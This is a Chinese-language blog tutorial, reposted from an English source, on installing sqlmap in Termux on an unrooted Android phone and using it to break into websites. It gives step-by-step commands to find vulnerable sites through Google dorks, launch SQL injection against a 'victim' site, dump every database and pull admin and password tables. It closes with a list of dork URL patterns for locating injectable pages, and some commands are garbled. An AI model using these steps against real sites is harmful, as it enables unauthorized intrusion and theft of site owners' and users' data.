如何在没有ROOT访问的Android上执行SQL注入

AlexFrankly 2018-4-10 教学频道 0 2

大家好,今天我将向您展示如何在没有root权限的情况下在Android上安装SQLMAP,并使用SQL注入攻击网站。

sqlmap是为Linux设计的,它基于一些基本的SQL注入漏洞,如盲注,时间注入,报错注入等。我个人发现了这个技巧并将它带给你们,这适用于非ROOT手机而且它不需要太多的空间来安装。所以你可以使用它几乎不需要20MB储存。

此外它不需要任何Linux发行版,您可以在小型手机中使用它。而且我亲自在许多手机上进行了测试,它都能正常工作。

附上一条独家视频,它会帮助您更好地理解!

让我们开始吧!

要求
Termux  (Linux终端包含许多内置命令)
Sqlmap  (用于SQL注入)
文件管理器  (查看日志和数据库)

 

Android上的SQLMAP:安装
首先安装上述链接中的所有应用程序并至少运行一次。下载SqlMap的ZIP文件并解压它在SD卡中并更改其名称。
之后,打开Termux并运行命令。

apt update && apt upgrade
它需要一些时间来更新,会提示你需要一些空间。您只需简单安装,按y即可。
如果您使用的是Android 6.0+版手机,那么您需要运行此命令,或者如果您使用较低版本,则可以跳过。这不是强制性的,但我建议你运行它。

termux-setup-storage
它会提示允许使用你的内部存储。继续点击允许按钮,然后执行下一步。

packages install python2
该命令将在您的termux中安装Python。输入y以在termux中安装python2。

 

继续!
可以了,好了!你只需要在手机中找到sqlmap.py脚本。为了实现这一点,首先你需要访问根文件夹,所以首先运行:
cd /

然后输入
cd sdcard
cd ls 

它会显示所有包含的文件。现在你需要找到sqlmap-master (提取的文件夹)。

cd sqlmap-master 
cd sqlmap-master

输入sqlmap-master(上面的命令)两次。
如果您已经将sqlmap-master的名称更改为sqlmap, 那么您可以运行,

cd sqlmap
cd sqlmap-master

您可以借助   “ ls” 命令列出该位置的所有文件。
cd到存储sqlmap.py的sqlmap-master文件夹。现在运行sqlmap你需要下面的命令:

 

python2 sqlmap.py
如果你看到这个红色的sqlmap后就证明你完成了sqlmap的安装。下一步是使用sqlmap入侵网站,需要找到有SQL漏洞的网站。为此,请使用sqlmap google dork来查找网站。
如果您使用的是Google dork,请输入以下内容:
python2 sqlmap.py -g your_keyword 
如果你想使用直接URL,  那么:
python2 sqlmap.py -u your_url

你可以参考sqlmap的官方文档帮助,或者只需键入python2 sqlmap.py -h 查看基本帮助和  python2 sqlmap.py -hh 查看高级帮助。
如果你想破解整个网站的所有的数据库和表格,只需将-a 添加到任一命令中 python2 sqlmap.py -g your_keyword  或   python2 sqlmap.py -u your_url 

在google dork中,它会给你三个选项:
1.是攻击第一个站点,从而产生结果。为了进一步处理,你需要输入“y”。
2.跳到下一个目标,你可以使用“n”。
3.退出时,使用“q”。

设置攻击!
之后它将开始攻击受害者的网站。等到它完成,可能会提示您以下问题,只需点击“y”即可。

之后,它会向您显示几个表格和其他入侵数据。不用担心,当进程完成时,您可以在日志中查看它。
现在,如果你想看到所有的表,你需要运行以下命令:
python2 sqlmap.py -u url --tables

现在只需输入以下命令即可选择要查看的表。一般情况下,我想查看管理表、要查看密码,运行
python2 sqlmap.py -u url -T your_table name
这个命令会将你的表数据和日志文件保存在root文件夹中,这对于普通的非root用户来说是不可访问的,但不用担心,我们可以解决这个终端可以访问的问题,所以我们将把这个文件复制到你的内部存储器中
cp source //sdcard
只需用上述命令替换源代码,它将省略转储文件,现在使用内置文件管理器或使用ES文件管理器导航到文件位置

成功!您在Android上使用sqlmap成功入侵网站。

 

谷歌语法
我在这里给出了一些重要的dorks,所以你可以很容易地找到易受SQL攻击的站点!
add-to-cart.php?ID=

addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id=

原文:https://www.hackeroyale.com/sqlmap-on-android-nonrooted-tutorial/

转载请注明来自华盟网,本文标题:《如何在没有ROOT访问的Android上执行SQL注入》

喜欢 (2) 发布评论
图片描述